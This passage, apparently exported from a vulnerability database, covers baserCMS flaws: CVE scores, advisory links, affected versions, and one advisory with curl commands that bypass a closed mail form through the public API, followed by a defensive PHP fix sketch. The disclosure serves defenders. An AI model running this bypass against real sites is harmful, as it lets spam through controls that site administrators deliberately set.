reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-32734
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-32734
6
reference_url https://github.com/advisories/GHSA-677c-xv24-crgx
reference_id GHSA-677c-xv24-crgx
reference_type
scores
url https://github.com/advisories/GHSA-677c-xv24-crgx
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-32734, GHSA-677c-xv24-crgx
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8ssu-umet-37bk
8
url VCID-ays7-6wvh-augt
vulnerability_id VCID-ays7-6wvh-augt
summary
baserCMS vulnerable to stored Cross-site Scripting
Stored cross-site scripting vulnerability in User group management of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-42486
reference_id
reference_type
scores
0
value 0.00144
scoring_system epss
scoring_elements 0.3445
published_at 2026-06-04T12:55:00Z
1
value 0.00144
scoring_system epss
scoring_elements 0.34547
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-42486
1
reference_url https://basercms.net/security/JVN_53682526
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/
url https://basercms.net/security/JVN_53682526
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://jvn.jp/en/jp/JVN53682526/index.html
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/
url https://jvn.jp/en/jp/JVN53682526/index.html
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-42486
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-42486
5
reference_url https://github.com/advisories/GHSA-7w2v-35j3-xrm9
reference_id GHSA-7w2v-35j3-xrm9
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7w2v-35j3-xrm9
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.2
purl pkg:composer/baserproject/basercms@4.7.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-j37y-gws9-ake9
9
vulnerability VCID-jby7-s5ez-dqb3
10
vulnerability VCID-k5qv-4yp3-zbgf
11
vulnerability VCID-khft-xvrw-g3dr
12
vulnerability VCID-mfm9-gsh3-ubg8
13
vulnerability VCID-nxrf-64er-xbfx
14
vulnerability VCID-p695-t9ye-v3ga
15
vulnerability VCID-pd8c-9d7z-zkhg
16
vulnerability VCID-sqr4-v889-tff8
17
vulnerability VCID-u16w-rbuk-ybfs
18
vulnerability VCID-uedz-j2vn-cbea
19
vulnerability VCID-y2sz-c6vb-pkdp
20
vulnerability VCID-zqd4-rdem-jfgk
21
vulnerability VCID-zsgc-fnen-b7a6
22
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2
aliases CVE-2022-42486, GHSA-7w2v-35j3-xrm9
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ays7-6wvh-augt
9
url VCID-d1sf-cmct-zbh1
vulnerability_id VCID-d1sf-cmct-zbh1
summary
baserCMS has Mail Form Acceptance Bypass via Public API
### Summary
A public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.

### Details
In baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in `MailFrontService::isAccepting()`, which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).

These checks are enforced in the UI flow handled by `MailController::index()` and `MailController::confirm()`  
(e.g. `plugins/bc-mail/src/Controller/MailController.php`).

However, the public API endpoint:

`plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()`

does not invoke `MailFrontService::isAccepting()` and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state.

The endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.

### PoC
1. In the admin UI, configure a mail form so that it is **not accepting submissions** (e.g. outside its acceptance period or explicitly closed).
2. Obtain a CSRF cookie by accessing the site root:
```
curl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://localhost/'
```
3. Extract the CSRF token from the `csrfToken` cookie and submit a POST request to the public API endpoint:
```
curl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mail_messages/add/1.json' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Referer: http://localhost/' \
  -H 'X-CSRF-Token: <csrf-token-from-cookie>' \
  -b /tmp/basercms_cookies.txt \
  --data-urlencode 'name_1=Test' \
  --data-urlencode 'name_2=User' \
  --data-urlencode 'email_1=test@example.com' \
  --data-urlencode 'email_2=test@example.com' \
  --data-urlencode 'category[]=資料請求' \
  --data-urlencode 'root=検索エンジン' \
  --data-urlencode 'message=API bypass test'
```
4. The server responds with `200 OK` and creates a mail message, even though the form is configured to reject submissions.

### Impact
This is an access control / business logic bypass vulnerability.

Administrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption.
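The fix pattern the advisory implies, as an added sketch that is not baserCMS's own code: the API create action runs the same acceptance guard as the UI flow before anything is persisted. The class and method names `MailFrontService::isAccepting()` and `MailMessagesController::add()` come from the advisory above; the method signatures, the `MailContent` shape, the repository interface and the response format are assumptions (PHP 8.1+ assumed for readonly properties).

```php
<?php
// Hypothetical sketch (not baserCMS code). Only the class/method names
// MailFrontService::isAccepting() and MailMessagesController::add() are taken
// from the advisory; every signature and field below is an assumption.
declare(strict_types=1);

interface MailMessagesRepository          // assumed persistence layer
{
    public function create(int $mailContentId, array $data): int;
}

final class MailContent                   // assumed form entity
{
    public function __construct(
        public readonly int $id,
        public readonly bool $closed,     // admin explicitly closed the form
        public readonly ?\DateTimeImmutable $publishBegin,
        public readonly ?\DateTimeImmutable $publishEnd,
    ) {}
}

final class MailFrontService
{
    // Single source of truth for "is this form accepting submissions?".
    // Both the UI controller and the API controller must call this.
    public function isAccepting(MailContent $form, \DateTimeImmutable $now): bool
    {
        if ($form->closed) {
            return false;
        }
        if ($form->publishBegin !== null && $now < $form->publishBegin) {
            return false;
        }
        if ($form->publishEnd !== null && $now > $form->publishEnd) {
            return false;
        }
        return true;
    }
}

final class MailMessagesController
{
    public function __construct(
        private readonly MailFrontService $front,
        private readonly MailMessagesRepository $messages,
    ) {}

    // Shape the advisory describes as vulnerable: persists without ever
    // consulting isAccepting(), so a closed form still takes submissions.
    public function addUnguarded(MailContent $form, array $data): array
    {
        $id = $this->messages->create($form->id, $data);
        return ['status' => 200, 'body' => ['mailMessage' => ['id' => $id]]];
    }

    // Hardened shape: the guard runs first and nothing is written unless it
    // passes, mirroring what MailController::index()/confirm() do for the UI.
    public function add(MailContent $form, array $data, ?\DateTimeImmutable $now = null): array
    {
        $now ??= new \DateTimeImmutable('now');
        if (!$this->front->isAccepting($form, $now)) {
            // Status code is a choice; use whatever the rest of the API returns
            // for a refused request. The point is: no record is created.
            return ['status' => 403, 'body' => ['message' => 'This form is not accepting submissions.']];
        }
        $id = $this->messages->create($form->id, $data);
        return ['status' => 200, 'body' => ['mailMessage' => ['id' => $id]]];
    }
}

// Constructed demo: a form the admin has closed, plus an in-memory repository.
$repo = new class implements MailMessagesRepository {
    public array $rows = [];
    public function create(int $mailContentId, array $data): int
    {
        $this->rows[] = [$mailContentId, $data];
        return count($this->rows);
    }
};
$controller = new MailMessagesController(new MailFrontService(), $repo);
$closedForm = new MailContent(id: 1, closed: true, publishBegin: null, publishEnd: null);
$payload    = ['name_1' => 'Test', 'name_2' => 'User', 'message' => 'API bypass test'];

$unguarded = $controller->addUnguarded($closedForm, $payload);   // 200, row written
$guarded   = $controller->add($closedForm, $payload);            // 403, no new row
assert($unguarded['status'] === 200 && count($repo->rows) === 1);
assert($guarded['status'] === 403 && count($repo->rows) === 1);
```

A regression test for this class of bug is the same two calls: submit against a form that is closed or outside its publish window through every entry point (UI and API) and assert that no `mail_messages` row appears.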
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30878
reference_id
reference_type
scores
0
value 0.0002
scoring_system epss
scoring_elements 0.05615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30878
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30878
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30878
6
reference_url https://github.com/advisories/GHSA-8cr7-r8qw-gp3c
reference_id GHSA-8cr7-r8qw-gp3c
reference_type
scores
url https://github.com/advisories/GHSA-8cr7-r8qw-gp3c
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30878, GHSA-8cr7-r8qw-gp3c
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-d1sf-cmct-zbh1
10
url VCID-eq7f-n3g5-s3hu
vulnerability_id VCID-eq7f-n3g5-s3hu
summary
Cross-site Scripting
Improper neutralization of JavaScript input in the page editing function of baserCMS allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-20681
reference_id
reference_type
scores
0
value 0.00203
scoring_system epss
scoring_elements 0.42327
published_at 2026-06-04T12:55:00Z
1
value 0.00203
scoring_system epss
scoring_elements 0.42402
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-20681
1
reference_url https://basercms.net/security/JVN64869876
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN64869876
2
reference_url https://jvn.jp/en/jp/JVN64869876/index.html
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://jvn.jp/en/jp/JVN64869876/index.html
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-20681
reference_id CVE-2021-20681
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-20681
fixed_packages
0
url pkg:composer/baserproject/basercms@4.4.5
purl pkg:composer/baserproject/basercms@4.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-5ay3-1t5g-vycu
3
vulnerability VCID-7x3n-4c2b-nfbx
4
vulnerability VCID-891u-x525-ykbb
5
vulnerability VCID-8buz-nsr9-3yge
6
vulnerability VCID-8ssu-umet-37bk
7
vulnerability VCID-ays7-6wvh-augt
8
vulnerability VCID-d1sf-cmct-zbh1
9
vulnerability VCID-g56w-z9cx-5ygv
10
vulnerability VCID-ggv8-3v9t-mfea
11
vulnerability VCID-hpk4-a6tr-3ffe
12
vulnerability VCID-j37y-gws9-ake9
13
vulnerability VCID-jby7-s5ez-dqb3
14
vulnerability VCID-k575-suuf-7bhf
15
vulnerability VCID-k5qv-4yp3-zbgf
16
vulnerability VCID-khft-xvrw-g3dr
17
vulnerability VCID-kmpp-6j49-pqfz
18
vulnerability VCID-mfm9-gsh3-ubg8
19
vulnerability VCID-nxrf-64er-xbfx
20
vulnerability VCID-p695-t9ye-v3ga
21
vulnerability VCID-pd8c-9d7z-zkhg
22
vulnerability VCID-sqr4-v889-tff8
23
vulnerability VCID-u16w-rbuk-ybfs
24
vulnerability VCID-uedz-j2vn-cbea
25
vulnerability VCID-y2sz-c6vb-pkdp
26
vulnerability VCID-zqd4-rdem-jfgk
27
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5
aliases CVE-2021-20681, GHSA-24p5-x9f9-vvpx
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-eq7f-n3g5-s3hu
11
url VCID-g56w-z9cx-5ygv
vulnerability_id VCID-g56w-z9cx-5ygv
summary Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-29009
reference_id
reference_type
scores
0
value 0.0055
scoring_system epss
scoring_elements 0.68361
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-29009
1
reference_url https://basercms.net/security/JVN_45547161
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://basercms.net/security/JVN_45547161
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2
4
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-29009
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-29009
6
reference_url https://github.com/advisories/GHSA-8vqx-prq4-rqrq
reference_id GHSA-8vqx-prq4-rqrq
reference_type
scores
url https://github.com/advisories/GHSA-8vqx-prq4-rqrq
7
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq
reference_id GHSA-8vqx-prq4-rqrq
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0-beta1
purl pkg:composer/baserproject/basercms@5.0.0-beta1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0-beta1
aliases CVE-2023-29009, GHSA-8vqx-prq4-rqrq
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-g56w-z9cx-5ygv
12
url VCID-ggv8-3v9t-mfea
vulnerability_id VCID-ggv8-3v9t-mfea
summary
baserCMS Cross-site Scripting vulnerability in Site search Feature
There is an XSS vulnerability in the site search feature of baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-44379
reference_id
reference_type
scores
0
value 0.00622
scoring_system epss
scoring_elements 0.70549
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-44379
1
reference_url https://basercms.net/security/JVN_73283159
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://basercms.net/security/JVN_73283159
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-44379
reference_id CVE-2023-44379
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-44379
5
reference_url https://github.com/advisories/GHSA-66c2-p8rh-qx87
reference_id GHSA-66c2-p8rh-qx87
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-66c2-p8rh-qx87
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87
reference_id GHSA-66c2-p8rh-qx87
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2023-44379, GHSA-66c2-p8rh-qx87
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ggv8-3v9t-mfea
13
url VCID-hpk4-a6tr-3ffe
vulnerability_id VCID-hpk4-a6tr-3ffe
summary baserCMS is an open source content management system with a focus on Japanese language support. A Cross-site Scripting vulnerability has been identified.
references
0
reference_url http://jvn.jp/en/jp/JVN14134801/index.html
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN14134801/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-39136
reference_id
reference_type
scores
0
value 0.0054
scoring_system epss
scoring_elements 0.67989
published_at 2026-06-05T12:55:00Z
1
value 0.0054
scoring_system epss
scoring_elements 0.6795
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-39136
2
reference_url https://basercms.net/security/JVN_14134801
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_14134801
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3
reference_id
reference_type
scores
0
value 8.7
